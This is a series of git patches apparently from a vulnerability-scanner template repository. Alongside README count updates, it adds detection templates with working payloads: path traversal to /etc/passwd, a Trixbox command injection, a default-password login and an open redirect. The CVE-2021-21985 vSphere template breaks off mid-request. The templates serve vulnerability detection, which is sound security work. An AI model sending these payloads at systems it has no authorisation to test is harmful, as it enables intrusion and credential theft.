[1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]' + - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$' part: body From 2aab1993e095e99cee8d28e4996d73f4163092a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 07:39:56 +0000 Subject: [PATCH 033/144] Auto Update README [Mon May 31 07:39:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0cacc956a9..ce06ce9566 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 140 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1175 files**. +**109 directories, 1176 files**. From 4474785111bb9c1228ba5de5c82e7e962289b5ef Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 07:40:50 +0000 Subject: [PATCH 034/144] Auto Update README [Mon May 31 07:40:50 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ce06ce9566..6a2cc89ce2 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 140 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 141 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1176 files**. +**109 directories, 1177 files**. From 5fed1d3432d794cc92d682480c93ae1f9e4bfa5e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 13:31:13 +0530 Subject: [PATCH 035/144] Improved matcher --- vulnerabilities/wordpress/wordpress-db-repair.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-db-repair.yaml b/vulnerabilities/wordpress/wordpress-db-repair.yaml index 56d2049ebd..7c9d635e19 100644 --- a/vulnerabilities/wordpress/wordpress-db-repair.yaml +++ b/vulnerabilities/wordpress/wordpress-db-repair.yaml @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - "WordPress › Database Repair" + - "WordPress" - type: word words: From 2ad903dcf1082c13ba39dc335dcc95524a478b94 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 14:19:23 +0530 Subject: [PATCH 036/144] misc changes --- .../other/hjtcloud-arbitrary-file-read.yaml | 11 ++++------- .../other/hjtcloud-rest-arbitrary-file-read.yaml | 13 ++++++++----- 2 files changed, 12 insertions(+), 12 deletions(-) rename exposures/configs/hjtcloud-information-disclosure.yaml => vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml (52%) diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index 264e1a0ca0..d12090b6ae 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -27,19 +27,16 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 20 - fullPath=/Windows/win.ini + fullPath=/Windows/win.ini matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" - - - type: word - words: - - "extensions" - part: body + - "root:[x*]:0:0:" + - "bit app support" + condition: or - type: status status: diff --git a/exposures/configs/hjtcloud-information-disclosure.yaml b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml similarity index 52% rename from exposures/configs/hjtcloud-information-disclosure.yaml rename to vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml index 2cb19bf1f5..e6c73c79e9 100644 --- a/exposures/configs/hjtcloud-information-disclosure.yaml +++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml @@ -1,24 +1,27 @@ -id: hjtcloud-information-disclosure +id: hjtcloud-arbitrary-file-read info: - name: HJTcloud Information Disclosure + name: HJTcloud Arbitrary file read author: pikpikcu severity: low reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw - tags: hjtcloud,exposure,config + tags: hjtcloud,lfi requests: - method: GET path: - - "{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../" + - "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../" matchers-condition: and matchers: - type: word words: - - "/var/logs/../logs/" + - "name" + - "length" + - "filePath" + condition: and - type: status status: From e56a64402cce02dfa79ab4aabd46d399ebb2b4c8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 08:56:01 +0000 Subject: [PATCH 037/144] Create ns-asg-file-read.yaml --- vulnerabilities/other/ns-asg-file-read.yaml | 26 +++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/ns-asg-file-read.yaml diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml new file mode 100644 index 0000000000..8fb79f6637 --- /dev/null +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -0,0 +1,26 @@ +id: ns-asg-file-read + +info: + name: NS ASG File Read + author: pikpikcu + severity: high + reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: ns-asg,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" + - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + - "$certfile" + + - type: status + status: + - 200 From 1fc0136ba67c8f3626efc6b4bc95b4f4527ffbb9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 31 May 2021 08:57:34 +0000 Subject: [PATCH 038/144] Auto Update README [Mon May 31 08:57:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6a2cc89ce2..85dd57d210 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 141 | +| cves | 321 | vulnerabilities | 173 | exposed-panels | 141 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1177 files**. +**109 directories, 1179 files**. </td> </tr> From 7b8f05e8597e01dca70d1c52ee06e67652150032 Mon Sep 17 00:00:00 2001 From: Pramod Sargar <41449799+impramodsargar@users.noreply.github.com> Date: Mon, 31 May 2021 14:42:57 +0530 Subject: [PATCH 039/144] synnefo admin panel added --- exposed-panels/synnefo-admin-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/synnefo-admin-panel.yaml diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml new file mode 100644 index 0000000000..95d578ef2e --- /dev/null +++ b/exposed-panels/synnefo-admin-panel.yaml @@ -0,0 +1,22 @@ +id: synnefo-admin-panel + +info: + name: Synnefo Admin Panel Exposure + author: impramodsargar + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/synnefoclient/" + + matchers-condition: and + matchers: + - type: word + words: + - '<title>Synnefo Admin' + + - type: status + status: + - 200 From 06918a764db53efddc2076467f017007563c36e0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:15:57 +0000 Subject: [PATCH 040/144] Create arl-default-password.yaml --- default-logins/arl/arl-default-password.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/arl/arl-default-password.yaml diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml new file mode 100644 index 0000000000..935db2e5ed --- /dev/null +++ b/default-logins/arl/arl-default-password.yaml @@ -0,0 +1,27 @@ +id: arl-default-password + +info: + name: ARL Default Password + author: pikpikcu + severity: high + tags: arl,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/api/user/login" + headers: + Content-Type: application/json; charset=UTF-8 + body: | + {"username":"admin","password":"arlpass"} + + matchers-condition: and + matchers: + + - type: word + words: + - '\"token\":' + + - type: status + status: + - 200 From f43937e5c1200daea4e5f744efa66004fb88dbf7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 14:57:05 +0530 Subject: [PATCH 041/144] Update synnefo-admin-panel.yaml --- exposed-panels/synnefo-admin-panel.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml index 95d578ef2e..221969aaca 100644 --- a/exposed-panels/synnefo-admin-panel.yaml +++ b/exposed-panels/synnefo-admin-panel.yaml @@ -1,6 +1,6 @@ id: synnefo-admin-panel -info: +info: name: Synnefo Admin Panel Exposure author: impramodsargar severity: info @@ -13,10 +13,10 @@ requests: matchers-condition: and matchers: - - type: word - words: + - type: word + words: - 'Synnefo Admin' - type: status - status: + status: - 200 From a7d10053f0b5b5f2df195cd39e03e3351db1b0a7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 14:58:06 +0530 Subject: [PATCH 042/144] Added tags --- exposed-panels/synnefo-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml index 221969aaca..9a79f3b8da 100644 --- a/exposed-panels/synnefo-admin-panel.yaml +++ b/exposed-panels/synnefo-admin-panel.yaml @@ -4,7 +4,7 @@ info: name: Synnefo Admin Panel Exposure author: impramodsargar severity: info - tags: panel + tags: panel,synnefo requests: - method: GET From f944191e7a9d5eeeec0a4dbe32652072e6943623 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:29:51 +0000 Subject: [PATCH 043/144] Create blue-ocean-excellence-lfi.yaml --- .../other/blue-ocean-excellence-lfi.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/other/blue-ocean-excellence-lfi.yaml diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml new file mode 100644 index 0000000000..cb2c86fa77 --- /dev/null +++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml @@ -0,0 +1,24 @@ +id: blue-ocean-excellence-lfi + +info: + name: Blue Ocean Excellence LFI + author: pikpikcu + severity: medium + reference: https://blog.csdn.net/qq_41901122/article/details/116786883 + tags: blue-ocean,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "toot:[x*]:0:0" + + - type: status + status: + - 200 From 57b000ae000966266f3994d835d14420cd835ff1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 09:30:46 +0000 Subject: [PATCH 044/144] Auto Update README [Mon May 31 09:30:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 85dd57d210..23998ce2ac 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 173 | exposed-panels | 141 | +| cves | 321 | vulnerabilities | 173 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1179 files**. +**109 directories, 1180 files**. From 014054485a43a927d1e28e181ae80c1ae7e62eed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 31 May 2021 15:16:17 +0530 Subject: [PATCH 045/144] Update arl-default-password.yaml --- default-logins/arl/arl-default-password.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml index 935db2e5ed..6bf1cd4ca8 100644 --- a/default-logins/arl/arl-default-password.yaml +++ b/default-logins/arl/arl-default-password.yaml @@ -20,7 +20,9 @@ requests: - type: word words: - - '\"token\":' + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' - type: status status: From b0eca52c4b4a5094d63c33cbeadcbec545fe1598 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:46:53 +0000 Subject: [PATCH 046/144] Create CVE-2017-14535.yaml --- cves/2017/CVE-2017-14535.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2017/CVE-2017-14535.yaml diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml new file mode 100644 index 0000000000..1d890e7405 --- /dev/null +++ b/cves/2017/CVE-2017-14535.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-14535 + +info: + name: Trixbox 2.8.0.4 Remote Code Execution + author: pikpikcu + severity: high + reference: https://www.exploit-db.com/exploits/49913 + tags: trixbox,rce + +requests: + - raw: + - | + POST /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + Connection: close + Upgrade-Insecure-Requests: 1 + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 4887efee041998477c55c56575edd9b0280b52ae Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 31 May 2021 15:22:14 +0530 Subject: [PATCH 047/144] Update arl-default-password.yaml --- default-logins/arl/arl-default-password.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml index 6bf1cd4ca8..08f426e7da 100644 --- a/default-logins/arl/arl-default-password.yaml +++ b/default-logins/arl/arl-default-password.yaml @@ -23,7 +23,7 @@ requests: - '"message": "success"' - '"username": "admin"' - '"type": "login"' - + condition: and - type: status status: - 200 From 378b4fcf81e8ff5f32fd5d0a362ef2d565c485b5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 09:54:32 +0000 Subject: [PATCH 049/144] Auto Update README [Mon May 31 09:54:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 23998ce2ac..9d6cde8f68 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 321 | vulnerabilities | 173 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | -| default-logins | 29 | exposed-tokens | 0 | dns | 9 | +| default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1180 files**. +**110 directories, 1181 files**. From f75748d6ffba133736a1fdb6dea032ea65b2d2d3 Mon Sep 17 00:00:00 2001 From: Pramod Sargar <41449799+impramodsargar@users.noreply.github.com> Date: Mon, 31 May 2021 15:39:58 +0530 Subject: [PATCH 050/144] OpenERP database instances detection added --- .../openerp-database-instances-detect.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/openerp-database-instances-detect.yaml diff --git a/technologies/openerp-database-instances-detect.yaml b/technologies/openerp-database-instances-detect.yaml new file mode 100644 index 0000000000..38c10b6122 --- /dev/null +++ b/technologies/openerp-database-instances-detect.yaml @@ -0,0 +1,22 @@ +id: OpenERP-database-instances + +info: + name: OpenERP database instances + author: impramodsargar + severity: info + tags: database + +requests: + - method: GET + path: + - "{{BaseURL}}/web/database/selector/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Odoo' + + - type: status + status: + - 200 From 31341b547eeea55a81693d948d6cc83b00d2d2d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 31 May 2021 15:44:21 +0530 Subject: [PATCH 051/144] Update blue-ocean-excellence-lfi.yaml --- vulnerabilities/other/blue-ocean-excellence-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml index cb2c86fa77..dffb6b050f 100644 --- a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml +++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml @@ -3,7 +3,7 @@ id: blue-ocean-excellence-lfi info: name: Blue Ocean Excellence LFI author: pikpikcu - severity: medium + severity: high reference: https://blog.csdn.net/qq_41901122/article/details/116786883 tags: blue-ocean,lfi @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "toot:[x*]:0:0" + - "toor:[x*]:0:0" - type: status status: From 57e24e9db1245dc401b1d40ef233db3be29b7cb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 10:15:26 +0000 Subject: [PATCH 052/144] Auto Update README [Mon May 31 10:15:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9d6cde8f68..74c5dd9066 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 173 | exposed-panels | 142 | +| cves | 321 | vulnerabilities | 174 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1181 files**. +**110 directories, 1182 files**. From 0187934d32ae50d2d9e2f3054adcc730b96ab0f4 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 31 May 2021 19:51:44 +0900 Subject: [PATCH 053/144] Create oracle-ebusiness-openredirect.yaml --- oracle-ebusiness-openredirect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 oracle-ebusiness-openredirect.yaml diff --git a/oracle-ebusiness-openredirect.yaml b/oracle-ebusiness-openredirect.yaml new file mode 100644 index 0000000000..682b6496e8 --- /dev/null +++ b/oracle-ebusiness-openredirect.yaml @@ -0,0 +1,24 @@ +id: oracle-ebusiness-openredirect + +info: + name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect + author: 0x_Akoko + severity: low + reference: https://www.exploit-db.com/exploits/43592 + tags: Oracle,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/plus/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com" + + matchers-condition: and + matchers: + - type: word + words: + - "Location: https://example.com" + part: header + + - type: status + status: + - 302 From 2cc30c771a7c7ad8e825792d234c964c79f87f03 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 16:53:36 +0530 Subject: [PATCH 054/144] misc updates --- cves/2017/CVE-2017-3528.yaml | 21 +++++++++++++++++++++ oracle-ebusiness-openredirect.yaml | 24 ------------------------ 2 files changed, 21 insertions(+), 24 deletions(-) create mode 100644 cves/2017/CVE-2017-3528.yaml delete mode 100644 oracle-ebusiness-openredirect.yaml diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml new file mode 100644 index 0000000000..f37b6660e4 --- /dev/null +++ b/cves/2017/CVE-2017-3528.yaml @@ -0,0 +1,21 @@ +id: CVE-2017-3528 + +info: + name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect + author: 0x_Akoko + severity: low + reference: | + - https://blog.zsec.uk/cve-2017-3528/ + - https://www.exploit-db.com/exploits/43592 + tags: oracle,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" + + matchers: + - type: word + words: + - 'noresize src="/\example.com?configName=' + part: body \ No newline at end of file diff --git a/oracle-ebusiness-openredirect.yaml b/oracle-ebusiness-openredirect.yaml deleted file mode 100644 index 682b6496e8..0000000000 --- a/oracle-ebusiness-openredirect.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: oracle-ebusiness-openredirect - -info: - name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect - author: 0x_Akoko - severity: low - reference: https://www.exploit-db.com/exploits/43592 - tags: Oracle,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/plus/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com" - - matchers-condition: and - matchers: - - type: word - words: - - "Location: https://example.com" - part: header - - - type: status - status: - - 302 From 26778216b3dd290f2241b98d7bfae8e1ec58d080 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 11:27:35 +0000 Subject: [PATCH 055/144] Auto Update README [Mon May 31 11:27:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 74c5dd9066..719e1bb854 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 174 | exposed-panels | 142 | +| cves | 322 | vulnerabilities | 174 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1182 files**. +**110 directories, 1183 files**. From da2dd11407ff63e9f54604a064bcdc578d2742f0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 17:07:43 +0530 Subject: [PATCH 056/144] moving files around --- .../openerp-database.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename technologies/openerp-database-instances-detect.yaml => exposed-panels/openerp-database.yaml (81%) diff --git a/technologies/openerp-database-instances-detect.yaml b/exposed-panels/openerp-database.yaml similarity index 81% rename from technologies/openerp-database-instances-detect.yaml rename to exposed-panels/openerp-database.yaml index 38c10b6122..1596be9ca4 100644 --- a/technologies/openerp-database-instances-detect.yaml +++ b/exposed-panels/openerp-database.yaml @@ -1,10 +1,10 @@ -id: OpenERP-database-instances +id: openerp-database -info: +info: name: OpenERP database instances author: impramodsargar severity: info - tags: database + tags: openerp requests: - method: GET @@ -19,4 +19,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 8dc17065dc57227558e9554af6b3b54c572605b9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 17:09:45 +0530 Subject: [PATCH 057/144] Update openerp-database.yaml --- exposed-panels/openerp-database.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/openerp-database.yaml b/exposed-panels/openerp-database.yaml index 1596be9ca4..c9446f8607 100644 --- a/exposed-panels/openerp-database.yaml +++ b/exposed-panels/openerp-database.yaml @@ -13,10 +13,10 @@ requests: matchers-condition: and matchers: - - type: word - words: + - type: word + words: - 'Odoo' - type: status - status: + status: - 200 \ No newline at end of file From 3dafff50c86c19fcac99d243d7966b7f886f373d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 11:41:36 +0000 Subject: [PATCH 058/144] Auto Update README [Mon May 31 11:41:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 719e1bb854..d7207c7b14 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 322 | vulnerabilities | 174 | exposed-panels | 142 | +| cves | 322 | vulnerabilities | 174 | exposed-panels | 143 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1183 files**. +**110 directories, 1184 files**. From 8d3f2e3604ea197ead0fe360e4f9e1bd4f9d2de4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 17:29:52 +0530 Subject: [PATCH 059/144] misc changes --- ...atistics-blindsql.yaml => wp-plugin-statistics-sqli.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename vulnerabilities/wordpress/{wp-statistics-blindsql.yaml => wp-plugin-statistics-sqli.yaml} (92%) diff --git a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml similarity index 92% rename from vulnerabilities/wordpress/wp-statistics-blindsql.yaml rename to vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml index 40730242cd..da683968f2 100644 --- a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml +++ b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml @@ -1,4 +1,5 @@ -id: WP-Statistics-BlindSQL +id: wp-plugin-statistics-sqli + info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection author: lotusdll @@ -8,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL - tags: unauth,blindsql,wordpress + tags: wordpress,wp-plugin,unauth,sqli,blind requests: - method: GET From 633644b159743e2bcde536cf6993edb95e5d818a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 19:20:59 +0530 Subject: [PATCH 060/144] Added CVE-2021-21985 --- cves/2021/CVE-2021-21985.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-21985.yaml diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml new file mode 100644 index 0000000000..97118e8ec5 --- /dev/null +++ b/cves/2021/CVE-2021-21985.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-21985 + +info: + name: VMware vSphere Client (HTML5) RCE + author: D0rkerDevil + severity: critical + description: | + The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 + - https://www.vmware.com/security/advisories/VMSA-2021-0010.html + - https://github.com/alt3kx/CVE-2021-21985_PoC + tags: cve,cve201,rce,vsphere + +requests: + - raw: + - | + POST 